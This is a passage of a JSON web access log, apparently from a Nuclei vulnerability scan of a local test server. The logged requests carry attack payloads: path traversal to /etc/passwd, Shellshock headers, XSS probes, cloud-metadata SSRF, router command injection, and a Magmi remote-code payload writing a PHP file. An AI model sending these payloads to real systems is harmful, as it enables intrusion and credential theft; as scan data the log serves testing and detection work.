/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /anchor/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon/LogonPoint/tmindex.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log_download.cgi?type=../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/carbuyaction.php?dopost=return&code=../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?s=/install/index/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /private.pem HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/latest/meta-data/ HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.336","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KAXxiroMEjg2ae950e7VTXvoz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.538","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mstore-api/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query {\x5Cn nuclei1:__typename \x5Cn nuclei2:__typename \x5Cn nuclei3:__typename \x5Cn nuclei4:__typename \x5Cn nuclei5:__typename \x5Cn nuclei6:__typename \x5Cn }\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://////example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api_smartapp/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /magmi/web/magmi_saveprofile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/config.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/console/login.action HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:33 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openapi.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /equipbid/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/stats HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1_db.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"http:","request":"POST /auth/tokens HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:34 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) 